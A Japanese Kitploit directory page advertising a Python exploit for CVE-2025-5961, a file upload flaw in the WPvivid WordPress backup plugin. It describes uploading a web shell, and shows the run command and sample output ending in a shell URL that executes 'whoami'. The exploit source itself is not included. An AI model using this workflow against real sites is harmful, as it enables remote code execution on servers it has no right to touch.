Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5961 — 移行、バックアップ、ステージング – WPvivid Backup & Migration <= 0.9.116 - 認証済み(管理者+)任意ファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-5961
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-5961

CVE-2025-5961

移行、バックアップ、ステージング – WPvivid Backup & Migration <= 0.9.116 - 認証済み(管理者+)任意ファイルアップロード

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 移行・バックアップ・ステージング – WPvivid Backup & Migration <= 0.9.116 - 認証済み(管理者以上)任意ファイルアップロード

📈 この脆弱性は、700,000以上のインストール数を誇るプラグインに影響します


📝 CVE 詳細

  • CVE: CVE-2025-5961
  • CVSS: 7.2(高)
  • 公開日: 2025年7月3日

🔍 説明

WordPress用プラグイン Migration, Backup, Staging – WPvivid Backup & Migration は、wpvivid_upload_import_files 関数におけるファイルタイプ検証の欠如により、任意のファイルアップロードに対して脆弱です。これはバージョン 0.9.116 までの全バージョンに影響します。

これにより、認証済みの攻撃者(管理者レベル以上) がサーバーに任意のファイルをアップロードでき、リモートコード実行を可能にする可能性があります。


🧰 スクリプト

このリポジトリには、CVE-2025-5961 用のPython製エクスプロイトスクリプトが含まれており、以下のことを行います:

  • プラグインのバージョンを確認します。
  • 管理者としてログインします。
  • プラグインページから必要なnonceを抽出します。
  • Webシェルのペイロードをアップロードします。
  • シェルにアクセスするためのURLを表示します。

🖥️ 使用例

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ 使い方

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 出力例

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ 免責事項

このスクリプトは、教育および研究目的のみで提供されています。
作者は、このツールによって引き起こされる誤用や損害について一切の責任を負いません。


✍️ 作者

Khaled Alenazi (Nxploited)
🌐 GitHub

ツールをダウンロード